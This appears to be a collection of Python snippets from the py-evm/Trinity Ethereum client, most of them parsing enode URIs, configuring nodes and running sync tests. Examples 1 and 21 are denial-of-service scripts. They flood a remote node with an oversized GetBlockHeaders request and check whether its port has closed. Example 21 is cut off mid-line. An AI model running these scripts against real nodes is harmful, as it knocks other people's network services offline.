Example no. 1
def _exp(node_url: str, chain: str) -> None:

    from evm.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER, ROPSTEN_VM_CONFIGURATION
    from evm.db.backends.memory import MemoryDB
    from tests.p2p.integration_test_helpers import FakeAsyncHeaderDB, connect_to_peers_loop

    ip, port = node_url.split('@')[1].split(':')
    if port_probe(ip, port):
        print('The port is open, starting to attack...')
    peer_class = LESPeer
    peer_pool = None
    if chain == 'mainnet':
        block_hash = '0xd4e56740f876aef8c010b86a40d5f56745a118d0906a34e69aec8c0db1cb8fa3'
        headerdb = FakeAsyncHeaderDB(MemoryDB())
        headerdb.persist_header(MAINNET_GENESIS_HEADER)
        network_id = MainnetChain.network_id
        nodes = [Node.from_uri(node_url)]
        peer_pool = PeerPool(peer_class, headerdb, network_id,
                             ecies.generate_privkey(),
                             MAINNET_VM_CONFIGURATION)
    elif chain == 'testnet':
        block_hash = '0x41941023680923e0fe4d74a34bdac8141f2540e3ae90623718e47d66d1ca4a2d'
        headerdb = FakeAsyncHeaderDB(MemoryDB())
        headerdb.persist_header(ROPSTEN_GENESIS_HEADER)
        network_id = RopstenChain.network_id
        nodes = [Node.from_uri(node_url)]
        peer_pool = PeerPool(peer_class, headerdb, network_id,
                             ecies.generate_privkey(),
                             ROPSTEN_VM_CONFIGURATION)
    loop = asyncio.get_event_loop()

    async def attack() -> None:
        nonlocal peer_pool
        nonlocal block_hash
        while not peer_pool.peers:
            print("Waiting for peer connection...")
            await asyncio.sleep(1)
        peer = cast(LESPeer, peer_pool.peers[0])
        cmd = GetBlockHeaders(peer.sub_proto.cmd_id_offset)
        data = {
            'request_id': 1,
            'query': GetBlockHeadersQuery(
                decode_hex(block_hash), 1, 0xffffffffffffffff, False),
        }
        header, body = cmd.encode(data)
        peer.sub_proto.send(header, body)
        await asyncio.sleep(1)
        result = port_probe(ip, port)
        if not result:
            print('The port is closed, attack succeeded...')
            exit()

    t1 = asyncio.ensure_future(connect_to_peers_loop(peer_pool, nodes))
    t2 = asyncio.ensure_future(attack())
    loop.set_debug(True)
    loop.run_until_complete(asyncio.wait([t1, t2]))
    loop.close()
Example no. 2
    def __init__(self,
                 network_id: int,
                 max_peers: int = DEFAULT_MAX_PEERS,
                 data_dir: str = None,
                 nodekey_path: str = None,
                 logfile_path: str = None,
                 nodekey: PrivateKey = None,
                 sync_mode: str = SYNC_FULL,
                 port: int = 30303,
                 preferred_nodes: Tuple[KademliaNode, ...] = None,
                 bootstrap_nodes: Tuple[KademliaNode, ...] = None) -> None:
        self.network_id = network_id
        self.max_peers = max_peers
        self.sync_mode = sync_mode
        self.port = port

        if not preferred_nodes and network_id in DEFAULT_PREFERRED_NODES:
            self.preferred_nodes = DEFAULT_PREFERRED_NODES[self.network_id]
        else:
            self.preferred_nodes = preferred_nodes

        if bootstrap_nodes is None:
            if self.network_id == MAINNET_NETWORK_ID:
                self.bootstrap_nodes = tuple(
                    KademliaNode.from_uri(enode)
                    for enode in MAINNET_BOOTNODES)
            elif self.network_id == ROPSTEN_NETWORK_ID:
                self.bootstrap_nodes = tuple(
                    KademliaNode.from_uri(enode)
                    for enode in ROPSTEN_BOOTNODES)
        else:
            self.bootstrap_nodes = bootstrap_nodes

        # validation
        if nodekey is not None and nodekey_path is not None:
            raise ValueError(
                "It is invalid to provide both a `nodekey` and a `nodekey_path`"
            )

        # set values
        if data_dir is not None:
            self.data_dir = data_dir
        else:
            self.data_dir = get_data_dir_for_network_id(self.network_id)

        if nodekey_path is not None:
            self.nodekey_path = nodekey_path
        elif nodekey is not None:
            self.nodekey = nodekey

        if logfile_path is not None:
            self.logfile_path = logfile_path
        else:
            self.logfile_path = get_logfile_path(self.data_dir)
Example no. 3
 def from_parser_args(cls, args: argparse.Namespace,
                      trinity_config: TrinityConfig) -> 'BaseAppConfig':
     if args is not None:
         # This is a quick and dirty way to get bootstrap_nodes
         trinity_config.bootstrap_nodes = tuple(
             KademliaNode.from_uri(enode) for enode in args.bootstrap_nodes.split(',')
         ) if args.bootstrap_nodes is not None else tuple()
         trinity_config.preferred_nodes = tuple(
             KademliaNode.from_uri(enode) for enode in args.preferred_nodes.split(',')
         ) if args.preferred_nodes is not None else tuple()
     return cls(trinity_config)
Example no. 4
 def from_parser_args(cls,
                      args: argparse.Namespace,
                      trinity_config: TrinityConfig) -> 'BaseAppConfig':
     """
     Initialize from the namespace object produced by
     an ``argparse.ArgumentParser`` and the :class:`~trinity.config.TrinityConfig`
     """
     if args is not None:
         # This is a quick and dirty way to get bootstrap_nodes
         trinity_config.bootstrap_nodes = tuple(
             KademliaNode.from_uri(enode) for enode in args.bootstrap_nodes.split(',')
         ) if args.bootstrap_nodes is not None else tuple()
         trinity_config.preferred_nodes = tuple(
             KademliaNode.from_uri(enode) for enode in args.preferred_nodes.split(',')
         ) if args.preferred_nodes is not None else tuple()
     return cls(trinity_config)
Example no. 5
    def _get_peer_candidates(self, num_requested: int,
                             connected_remotes: Set[Node]) -> Iterable[Node]:
        """
        Return up to `num_requested` candidates sourced from peers we have
        historically connected to which match the following criteria:

        * Matches all of: network_id, protocol, genesis_hash, protocol_version
        * Either has no blacklist record or existing blacklist record is expired.
        * Not in the set of remotes we are already connected to.
        """
        connected_uris = set(remote.uri() for remote in connected_remotes)
        now = datetime.datetime.utcnow()
        metadata_filters = self._get_candidate_filter_query()

        # Query the database for peers that match our criteria.
        candidates = self.session.query(Remote).outerjoin(  # type: ignore
            # Join against the blacklist records with matching node URI
            Remote.blacklist,
        ).filter(
            # Either they have no blacklist record or the record is expired.
            ((Remote.blacklist == None) |
             (BlacklistRecord.expires_at <= now)),  # noqa: E711
            # We are not currently connected to them
            ~Remote.uri.in_(connected_uris),  # type: ignore
            # They match our filters for network metadata
            *metadata_filters,
        ).order_by(
            # We want the ones that we have recently connected to successfully to be first.
            Remote.last_connected_at.desc(),  # type: ignore
        )

        # Return them as an iterator to allow the consuming process to
        # determine how many records it wants to fetch.
        for candidate in candidates:
            yield Node.from_uri(candidate.uri)
Example no. 6
    def __init__(self,
                 network_id: int,
                 app_identifier: str = "",
                 genesis_config: Dict[str, Any] = None,
                 max_peers: int = 25,
                 trinity_root_dir: Path = None,
                 trinity_tmp_root_dir: bool = False,
                 data_dir: Path = None,
                 nodekey_path: Path = None,
                 nodekey: PrivateKey = None,
                 port: int = 30303,
                 preferred_nodes: Tuple[KademliaNode, ...] = None,
                 bootstrap_nodes: Tuple[KademliaNode, ...] = None) -> None:
        self.app_identifier = app_identifier
        self.network_id = network_id
        self.max_peers = max_peers
        self.port = port
        self._app_configs = {}

        if genesis_config is not None:
            self.genesis_config = genesis_config
        elif network_id in PRECONFIGURED_NETWORKS:
            self.genesis_config = _load_preconfigured_genesis_config(
                network_id)
        else:
            raise TypeError(
                "No `genesis_config` was provided and the `network_id` is not "
                "in the known preconfigured networks.  Cannot initialize "
                "ChainConfig")

        if trinity_root_dir is not None:
            self.trinity_root_dir = trinity_root_dir
        self.trinity_tmp_root_dir = trinity_tmp_root_dir

        if not preferred_nodes and self.network_id in DEFAULT_PREFERRED_NODES:
            self.preferred_nodes = DEFAULT_PREFERRED_NODES[self.network_id]
        else:
            self.preferred_nodes = preferred_nodes

        if bootstrap_nodes is None:
            if self.network_id in PRECONFIGURED_NETWORKS:
                bootnodes = PRECONFIGURED_NETWORKS[self.network_id].bootnodes
                self.bootstrap_nodes = tuple(
                    KademliaNode.from_uri(enode) for enode in bootnodes)
            else:
                self.bootstrap_nodes = tuple()
        else:
            self.bootstrap_nodes = bootstrap_nodes

        if data_dir is not None:
            self.data_dir = data_dir

        if nodekey is not None and nodekey_path is not None:
            raise ValueError(
                "It is invalid to provide both a `nodekey` and a `nodekey_path`"
            )
        elif nodekey_path is not None:
            self.nodekey_path = nodekey_path
        elif nodekey is not None:
            self.nodekey = nodekey
Example no. 7
    async def addPeer(self, uri: str) -> None:
        validate_enode_uri(uri, require_ip=True)

        await self.event_bus.broadcast(
            ConnectToNodeCommand(Node.from_uri(uri)),
            TO_NETWORKING_BROADCAST_CONFIG
        )
Example no. 8
def _test() -> None:
    import argparse
    import signal
    from eth.chains.ropsten import RopstenChain, ROPSTEN_VM_CONFIGURATION
    from p2p import ecies
    from p2p.kademlia import Node
    from p2p.peer import DEFAULT_PREFERRED_NODES
    from tests.trinity.core.integration_test_helpers import (
        FakeAsyncChainDB, FakeAsyncLevelDB, connect_to_peers_loop)
    logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-debug', action="store_true")
    parser.add_argument('-enode', type=str, required=False, help="The enode we should connect to")
    args = parser.parse_args()

    log_level = logging.INFO
    if args.debug:
        log_level = logging.DEBUG

    db = FakeAsyncLevelDB(args.db)
    chaindb = FakeAsyncChainDB(db)
    network_id = RopstenChain.network_id
    if args.enode:
        nodes = tuple([Node.from_uri(args.enode)])
    else:
        nodes = DEFAULT_PREFERRED_NODES[network_id]
    peer_pool = PeerPool(
        ETHPeer, chaindb, network_id, ecies.generate_privkey(), ROPSTEN_VM_CONFIGURATION)
    asyncio.ensure_future(peer_pool.run())
    peer_pool.run_task(connect_to_peers_loop(peer_pool, nodes))

    head = chaindb.get_canonical_head()
    downloader = StateDownloader(chaindb, db, head.state_root, peer_pool)
    downloader.logger.setLevel(log_level)
    loop = asyncio.get_event_loop()

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint() -> None:
        await sigint_received.wait()
        await peer_pool.cancel()
        await downloader.cancel()
        loop.stop()

    async def run() -> None:
        await downloader.run()
        downloader.logger.info("run() finished, exiting")
        sigint_received.set()

    # loop.set_debug(True)
    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(run())
    loop.run_forever()
    loop.close()
Example no. 9
def _test() -> None:
    import argparse
    import asyncio
    import signal
    from eth.chains.ropsten import RopstenChain, ROPSTEN_VM_CONFIGURATION
    from eth.db.backends.level import LevelDB
    from p2p import ecies
    from p2p.kademlia import Node
    from trinity.protocol.common.constants import DEFAULT_PREFERRED_NODES
    from trinity.protocol.common.context import ChainContext
    from tests.trinity.core.integration_test_helpers import (
        FakeAsyncChainDB, FakeAsyncRopstenChain, connect_to_peers_loop)
    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s %(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-enode',
                        type=str,
                        required=False,
                        help="The enode we should connect to")
    args = parser.parse_args()

    chaindb = FakeAsyncChainDB(LevelDB(args.db))
    chain = FakeAsyncRopstenChain(chaindb)
    network_id = RopstenChain.network_id
    privkey = ecies.generate_privkey()

    context = ChainContext(headerdb=chaindb,
                           network_id=network_id,
                           vm_configuration=ROPSTEN_VM_CONFIGURATION)
    peer_pool = ETHPeerPool(privkey=privkey, context=context)
    if args.enode:
        nodes = tuple([Node.from_uri(args.enode)])
    else:
        nodes = DEFAULT_PREFERRED_NODES[network_id]
    asyncio.ensure_future(peer_pool.run())
    peer_pool.run_task(connect_to_peers_loop(peer_pool, nodes))

    loop = asyncio.get_event_loop()

    syncer = FullNodeSyncer(chain, chaindb, chaindb.db, peer_pool)

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint() -> None:
        await sigint_received.wait()
        await syncer.cancel()
        await peer_pool.cancel()
        loop.stop()

    loop.set_debug(True)
    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(syncer.run())
    loop.run_forever()
    loop.close()
Example no. 10
def test_node_from_enr_uri():
    privkey = PrivateKeyFactory()
    address = AddressFactory()
    enr = ENRFactory(private_key=privkey.to_bytes(), address=address)

    node = Node.from_uri(repr(enr))

    assert node.id == keccak(privkey.public_key.to_bytes())
    assert node.address == address
Example no. 11
def test_node_from_enode_uri():
    pubkey = 'a979fb575495b8d6db44f750317d0f4622bf4c2aa3365d6af7c284339968eef29b69ad0dce72a4d8db5ebb4968de0e3bec910127f134779fbcb0cb6d3331163c'  # noqa: E501
    ip = '52.16.188.185'
    port = 30303
    uri = 'enode://%s@%s:%d' % (pubkey, ip, port)
    node = Node.from_uri(uri)
    assert node.address.ip == ip
    assert node.address.udp_port == node.address.tcp_port == port
    assert node.pubkey.to_hex() == '0x' + pubkey
Example no. 12
    def __call__(self, parser, namespace, values, option_string=None):
        if values is None:
            return

        enode = Node.from_uri(values)

        if getattr(namespace, self.dest) is None:
            setattr(namespace, self.dest, [])
        enode_list = getattr(namespace, self.dest)
        enode_list.append(enode)
Example no. 13
def _test():
    import argparse
    import asyncio
    from concurrent.futures import ProcessPoolExecutor
    import signal
    from p2p import ecies
    from p2p.kademlia import Node
    from p2p.peer import ETHPeer, DEFAULT_PREFERRED_NODES
    from evm.chains.ropsten import RopstenChain, ROPSTEN_VM_CONFIGURATION
    from evm.db.backends.level import LevelDB
    from tests.p2p.integration_test_helpers import (
        FakeAsyncChainDB, FakeAsyncRopstenChain, connect_to_peers_loop)
    logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-enode', type=str, required=False, help="The enode we should connect to")
    args = parser.parse_args()

    chaindb = FakeAsyncChainDB(LevelDB(args.db))
    chain = FakeAsyncRopstenChain(chaindb)
    network_id = RopstenChain.network_id
    privkey = ecies.generate_privkey()
    peer_pool = PeerPool(ETHPeer, chaindb, network_id, privkey, ROPSTEN_VM_CONFIGURATION)
    if args.enode:
        nodes = tuple([Node.from_uri(args.enode)])
    else:
        nodes = DEFAULT_PREFERRED_NODES[network_id]
    asyncio.ensure_future(peer_pool.run())
    asyncio.ensure_future(connect_to_peers_loop(peer_pool, nodes))

    loop = asyncio.get_event_loop()
    loop.set_default_executor(ProcessPoolExecutor())

    syncer = FullNodeSyncer(chain, chaindb, chaindb.db, peer_pool)

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint():
        await sigint_received.wait()
        await syncer.cancel()
        await peer_pool.cancel()
        loop.stop()

    loop.set_debug(True)
    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(syncer.run())
    loop.run_forever()
    loop.close()
Example no. 14
    def __call__(self,
                 parser: argparse.ArgumentParser,
                 namespace: argparse.Namespace,
                 value: Any,
                 option_string: str = None) -> None:
        if value is None:
            return

        enode = Node.from_uri(value)

        if getattr(namespace, self.dest) is None:
            setattr(namespace, self.dest, [])
        enode_list = getattr(namespace, self.dest)
        enode_list.append(enode)
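The two __call__ bodies above (Examples 12 and 14) belong to a custom argparse.Action that turns each URI supplied on the command line into a Node via Node.from_uri and accumulates the results on the namespace. Below is a minimal sketch of how such an action could be registered with a parser; the NodeAction class name and the --preferred-node flag are illustrative assumptions, not taken from the source.

import argparse
from typing import Any

from p2p.kademlia import Node


class NodeAction(argparse.Action):
    """Collect each parsed enode/ENR URI into a list on the namespace."""

    def __call__(self,
                 parser: argparse.ArgumentParser,
                 namespace: argparse.Namespace,
                 value: Any,
                 option_string: str = None) -> None:
        if value is None:
            return
        if getattr(namespace, self.dest) is None:
            setattr(namespace, self.dest, [])
        getattr(namespace, self.dest).append(Node.from_uri(value))


parser = argparse.ArgumentParser()
# Hypothetical flag; repeat the option on the command line to collect several nodes.
parser.add_argument('--preferred-node', action=NodeAction, dest='preferred_nodes')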
Example no. 15
    async def removePeer(self, uri: str) -> bool:
        validate_enode_uri(uri, require_ip=True)
        peer_to_remove = Node.from_uri(uri)

        response = await self.event_bus.request(GetConnectedPeersRequest())
        for connected_peer_info in response.peers:
            if peer_to_remove == connected_peer_info.session.remote:
                await self.event_bus.broadcast(
                    DisconnectFromPeerCommand(
                        connected_peer_info,
                        DisconnectReason.DISCONNECT_REQUESTED,
                    ),
                )
                return True
        return False
Example no. 16
def test_node_from_enr_uri():
    privkey = PrivateKeyFactory()
    ip = socket.inet_aton(IPAddressFactory.generate())
    udp_port = tcp_port = 30303
    enr = ENRFactory(private_key=privkey.to_bytes(),
                     custom_kv_pairs={
                         IP_V4_ADDRESS_ENR_KEY: ip,
                         UDP_PORT_ENR_KEY: udp_port,
                         TCP_PORT_ENR_KEY: tcp_port
                     })

    node = Node.from_uri(repr(enr))

    assert node.id == keccak(privkey.public_key.to_bytes())
    assert node.address.ip_packed == ip
    assert node.address.tcp_port == tcp_port
    assert node.address.udp_port == udp_port
Example no. 17
async def test_lightchain_integration(request, event_loop, caplog,
                                      geth_ipc_path, enode, geth_process):
    """Test LightChainSyncer/LightPeerChain against a running geth instance.

    In order to run this manually, you can use `tox -e py36-lightchain_integration` or:

        pytest --integration --capture=no tests/integration/test_lightchain_integration.py

    The fixture for this test was generated with:

        geth --testnet --syncmode full

    It only needs the first 11 blocks for this test to succeed.
    """
    if not pytest.config.getoption("--integration"):
        pytest.skip("Not asked to run integration tests")

    # will almost certainly want verbose logging in a failure
    caplog.set_level(logging.DEBUG)

    # make sure geth has been launched
    wait_for_socket(geth_ipc_path)

    remote = Node.from_uri(enode)
    base_db = AtomicDB()
    chaindb = FakeAsyncChainDB(base_db)
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    headerdb = FakeAsyncHeaderDB(base_db)
    context = ChainContext(
        headerdb=headerdb,
        network_id=ROPSTEN_NETWORK_ID,
        vm_configuration=ROPSTEN_VM_CONFIGURATION,
    )
    peer_pool = LESPeerPool(
        privkey=ecies.generate_privkey(),
        context=context,
    )
    chain = FakeAsyncRopstenChain(base_db)
    syncer = LightChainSyncer(chain, chaindb, peer_pool)
    syncer.min_peers_to_sync = 1
    peer_chain = LightPeerChain(headerdb, peer_pool)
    server_request_handler = LightRequestServer(headerdb, peer_pool)

    asyncio.ensure_future(peer_pool.run())
    asyncio.ensure_future(connect_to_peers_loop(peer_pool, tuple([remote])))
    asyncio.ensure_future(peer_chain.run())
    asyncio.ensure_future(server_request_handler.run())
    asyncio.ensure_future(syncer.run())
    # Yield control to give the LightChainSyncer a chance to start
    await asyncio.sleep(0)

    def finalizer():
        event_loop.run_until_complete(peer_pool.cancel())
        event_loop.run_until_complete(peer_chain.cancel())
        event_loop.run_until_complete(syncer.cancel())
        event_loop.run_until_complete(server_request_handler.cancel())

    request.addfinalizer(finalizer)

    n = 11

    # Wait for the chain to sync a few headers.
    async def wait_for_header_sync(block_number):
        while headerdb.get_canonical_head().block_number < block_number:
            await asyncio.sleep(0.1)

    await asyncio.wait_for(wait_for_header_sync(n), 5)

    # https://ropsten.etherscan.io/block/11
    header = headerdb.get_canonical_block_header_by_number(n)
    body = await peer_chain.coro_get_block_body_by_hash(header.hash)
    assert len(body['transactions']) == 15

    receipts = await peer_chain.coro_get_receipts(header.hash)
    assert len(receipts) == 15
    assert encode_hex(keccak(rlp.encode(receipts[0]))) == (
        '0xf709ed2c57efc18a1675e8c740f3294c9e2cb36ba7bb3b89d3ab4c8fef9d8860')

    assert len(peer_pool) == 1
    peer = peer_pool.highest_td_peer
    head = await peer_chain.coro_get_block_header_by_hash(peer.head_hash)

    # In order to answer queries for contract code, geth needs the state trie entry for the block
    # we specify in the query, but because of fast sync we can only assume it has that for recent
    # blocks, so we use the current head to lookup the code for the contract below.
    # https://ropsten.etherscan.io/address/0x95a48dca999c89e4e284930d9b9af973a7481287
    contract_addr = decode_hex('0x8B09D9ac6A4F7778fCb22852e879C7F3B2bEeF81')
    contract_code = await peer_chain.coro_get_contract_code(
        head.hash, contract_addr)
    assert encode_hex(contract_code) == '0x600060006000600060006000356000f1'

    account = await peer_chain.coro_get_account(head.hash, contract_addr)
    assert account.code_hash == keccak(contract_code)
    assert account.balance == 0
Example no. 18
File: peer.py Project: tuxxy/py-evm
def _test():
    """
    Create a Peer instance connected to a local geth instance and log messages exchanged with it.

    Use the following command line to run geth:

        ./build/bin/geth -vmodule p2p=4,p2p/discv5=0,eth/*=0 \
          -nodekeyhex 45a915e4d060149eb4365960e6a7a45f334393093061116b197e3240065ff2d8 \
          -testnet -lightserv 90
    """
    import argparse
    import signal
    from evm.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER, ROPSTEN_VM_CONFIGURATION
    from evm.db.backends.memory import MemoryDB
    from tests.p2p.integration_test_helpers import FakeAsyncHeaderDB, connect_to_peers_loop
    logging.basicConfig(level=logging.DEBUG,
                        format='%(asctime)s %(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-enode',
                        type=str,
                        help="The enode we should connect to")
    parser.add_argument('-light',
                        action='store_true',
                        help="Connect as a light node")
    args = parser.parse_args()

    peer_class = ETHPeer  # type: ignore
    if args.light:
        peer_class = LESPeer  # type: ignore
    headerdb = FakeAsyncHeaderDB(MemoryDB())
    headerdb.persist_header(ROPSTEN_GENESIS_HEADER)
    network_id = RopstenChain.network_id
    loop = asyncio.get_event_loop()
    nodes = [Node.from_uri(args.enode)]
    peer_pool = PeerPool(peer_class, headerdb, network_id,
                         ecies.generate_privkey(), ROPSTEN_VM_CONFIGURATION)
    asyncio.ensure_future(connect_to_peers_loop(peer_pool, nodes))

    async def request_stuff():
        # Request some stuff from ropsten's block 2440319
        # (https://ropsten.etherscan.io/block/2440319), just as a basic test.
        nonlocal peer_pool
        while not peer_pool.peers:
            peer_pool.logger.info("Waiting for peer connection...")
            await asyncio.sleep(0.2)
        peer = peer_pool.peers[0]
        block_hash = decode_hex(
            '0x59af08ab31822c992bb3dad92ddb68d820aa4c69e9560f07081fa53f1009b152'
        )
        if peer_class == ETHPeer:
            peer = cast(ETHPeer, peer)
            peer.sub_proto.send_get_block_headers(block_hash, 1)
            peer.sub_proto.send_get_block_bodies([block_hash])
            peer.sub_proto.send_get_receipts([block_hash])
        else:
            peer = cast(LESPeer, peer)
            request_id = 1
            peer.sub_proto.send_get_block_headers(block_hash, 1, request_id)
            peer.sub_proto.send_get_block_bodies([block_hash], request_id + 1)
            peer.sub_proto.send_get_receipts(block_hash, request_id + 2)

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint():
        await sigint_received.wait()
        await peer_pool.cancel()
        loop.stop()

    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(request_stuff())
    asyncio.ensure_future(peer_pool.run())
    loop.set_debug(True)
    loop.run_forever()
    loop.close()
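Example no. 19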
async def test_lightchain_integration(request, event_loop):
    """Test LightChainSyncer/LightPeerChain against a running geth instance.

    In order to run this you need to pass the following to pytest:

        pytest --integration --enode=...
    """
    # TODO: Implement a pytest fixture that runs geth as above, so that we don't need to run it
    # manually.
    if not pytest.config.getoption("--integration"):
        pytest.skip("Not asked to run integration tests")

    remote = Node.from_uri(pytest.config.getoption("--enode"))
    base_db = MemoryDB()
    chaindb = FakeAsyncChainDB(base_db)
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    headerdb = FakeAsyncHeaderDB(base_db)
    peer_pool = PeerPool(LESPeer,
                         FakeAsyncHeaderDB(base_db), ROPSTEN_NETWORK_ID,
                         ecies.generate_privkey(), ROPSTEN_VM_CONFIGURATION)
    chain = FakeAsyncRopstenChain(base_db)
    syncer = LightChainSyncer(chain, chaindb, peer_pool)
    syncer.min_peers_to_sync = 1
    peer_chain = LightPeerChain(headerdb, peer_pool)

    asyncio.ensure_future(peer_pool.run())
    asyncio.ensure_future(connect_to_peers_loop(peer_pool, tuple([remote])))
    asyncio.ensure_future(peer_chain.run())
    asyncio.ensure_future(syncer.run())
    # Yield control to give the LightChainSyncer a chance to start
    await asyncio.sleep(0)

    def finalizer():
        event_loop.run_until_complete(peer_pool.cancel())
        event_loop.run_until_complete(peer_chain.cancel())
        event_loop.run_until_complete(syncer.cancel())

    request.addfinalizer(finalizer)

    n = 11

    # Wait for the chain to sync a few headers.
    async def wait_for_header_sync(block_number):
        while headerdb.get_canonical_head().block_number < block_number:
            await asyncio.sleep(0.1)

    await asyncio.wait_for(wait_for_header_sync(n), 5)

    # https://ropsten.etherscan.io/block/11
    header = headerdb.get_canonical_block_header_by_number(n)
    body = await peer_chain.get_block_body_by_hash(header.hash)
    assert len(body['transactions']) == 15

    receipts = await peer_chain.get_receipts(header.hash)
    assert len(receipts) == 15
    assert encode_hex(keccak(rlp.encode(receipts[0]))) == (
        '0xf709ed2c57efc18a1675e8c740f3294c9e2cb36ba7bb3b89d3ab4c8fef9d8860')

    assert len(peer_pool) == 1
    head_info = peer_pool.peers[0].head_info
    head = await peer_chain.get_block_header_by_hash(head_info.block_hash)
    assert head.block_number == head_info.block_number

    # In order to answer queries for contract code, geth needs the state trie entry for the block
    # we specify in the query, but because of fast sync we can only assume it has that for recent
    # blocks, so we use the current head to lookup the code for the contract below.
    # https://ropsten.etherscan.io/address/0x95a48dca999c89e4e284930d9b9af973a7481287
    contract_addr = decode_hex('95a48dca999c89e4e284930d9b9af973a7481287')
    contract_code = await peer_chain.get_contract_code(head.hash,
                                                       keccak(contract_addr))
    assert encode_hex(keccak(contract_code)) == (
        '0x1e0b2ad970b365a217c40bcf3582cbb4fcc1642d7a5dd7a82ae1e278e010123e')

    account = await peer_chain.get_account(head.hash, contract_addr)
    assert account.code_hash == keccak(contract_code)
    assert account.balance == 0
Example no. 20
async def test_sync_integration(request, caplog, geth_ipc_path, enode,
                                geth_process):
    """Test a regular chain sync against a running geth instance.

    In order to run this manually, you can use `tox -e py37-sync_integration` or:

        pytest --integration --capture=no tests/integration/test_sync.py

    The fixture for this test was generated with:

        geth --ropsten --syncmode full

    It only needs the first 11 blocks for this test to succeed.
    """
    if not request.config.getoption("--integration"):
        pytest.skip("Not asked to run integration tests")

    # will almost certainly want verbose logging in a failure
    caplog.set_level(logging.DEBUG)

    # make sure geth has been launched
    wait_for_socket(geth_ipc_path)

    remote = Node.from_uri(enode)
    base_db = AtomicDB()
    chaindb = AsyncChainDB(base_db)
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    headerdb = AsyncHeaderDB(base_db)
    chain_config = Eth1ChainConfig.from_preconfigured_network(
        ROPSTEN_NETWORK_ID)
    chain = chain_config.initialize_chain(base_db)
    context = ChainContext(
        headerdb=headerdb,
        network_id=ROPSTEN_NETWORK_ID,
        vm_configuration=ROPSTEN_VM_CONFIGURATION,
        client_version_string='trinity-test',
        listen_port=30303,
        p2p_version=DEVP2P_V5,
    )
    peer_pool = ETHPeerPool(privkey=ecies.generate_privkey(), context=context)
    syncer = RegularChainSyncer(chain, chaindb, peer_pool)

    async with background_asyncio_service(peer_pool) as manager:
        await manager.wait_started()
        await peer_pool.connect_to_nodes([remote])
        assert len(peer_pool) == 1

        async with background_asyncio_service(syncer) as syncer_manager:
            await syncer_manager.wait_started()

            n = 11

            manager.logger.info(f"Waiting for the chain to sync {n} blocks")

            async def wait_for_header_sync(block_number):
                while chaindb.get_canonical_head().block_number < block_number:
                    await asyncio.sleep(0.1)

            await asyncio.wait_for(wait_for_header_sync(n), 5)

            # https://ropsten.etherscan.io/block/11
            header = chaindb.get_canonical_block_header_by_number(n)
            transactions = chaindb.get_block_transactions(
                header, BaseTransactionFields)
            assert len(transactions) == 15

            receipts = chaindb.get_receipts(header, Receipt)
            assert len(receipts) == 15
            assert encode_hex(keccak(rlp.encode(receipts[0]))) == (
                '0xf709ed2c57efc18a1675e8c740f3294c9e2cb36ba7bb3b89d3ab4c8fef9d8860'
            )
Example no. 21
def main() -> None:
    logging.basicConfig(level=TRACE_LEVEL_NUM,
                        format='%(asctime)s %(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('--enode',
                        type=str,
                        help="The enode we should connect to",
                        required=True)
    parser.add_argument('--mainnet', action='store_true')
    parser.add_argument('--light',
                        action='store_true',
                        help="Connect as a light node")
    args = parser.parse_args()

    peer_class: Union[Type[ETHPeer], Type[LESPeer]]
    pool_class: Union[Type[ETHPeerPool], Type[LESPeerPool]]
    ip, port = args.enode.split('@')[1].split(':')
    if args.light:
        peer_class = LESPeer
        pool_class = LESPeerPool
    else:
        peer_class = ETHPeer
        pool_class = ETHPeerPool

    if args.mainnet:
        network_id = MainnetChain.network_id
        vm_config = MAINNET_VM_CONFIGURATION
        genesis = MAINNET_GENESIS_HEADER
    else:
        network_id = RopstenChain.network_id
        vm_config = ROPSTEN_VM_CONFIGURATION
        genesis = ROPSTEN_GENESIS_HEADER

    headerdb = FakeAsyncHeaderDB(AtomicDB())
    headerdb.persist_header(genesis)
    loop = asyncio.get_event_loop()
    nodes = [Node.from_uri(args.enode)]

    context = ChainContext(
        headerdb=headerdb,
        network_id=network_id,
        vm_configuration=vm_config,
    )
    peer_pool = pool_class(
        privkey=ecies.generate_privkey(),
        context=context,
    )

    asyncio.ensure_future(peer_pool.run())
    peer_pool.run_task(connect_to_peers_loop(peer_pool, nodes))

    def port_probe(ip, port):
        try:
            TCP_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            TCP_sock.settimeout(1)
            result = TCP_sock.connect_ex((ip, int(port)))
            # Close the socket and report whether the port accepted the connection.
            TCP_sock.close()
            return result == 0
        except socket.error:
            return False

    async def attack() -> None:
        nonlocal peer_pool
        peer_pool.logger.info('Attacking...')
        while not peer_pool.connected_nodes:
            peer_pool.logger.info("Waiting for peer connection...")
            await asyncio.sleep(1)
        peer = peer_pool.highest_td_peer
        if peer_class == ETHPeer:
            block_hash = '0xd4e56740f876aef8c010b86a40d5f56745a118d0906a34e69aec8c0db1cb8fa3'
            headers = await cast(ETHPeer, peer).requests.get_block_headers(
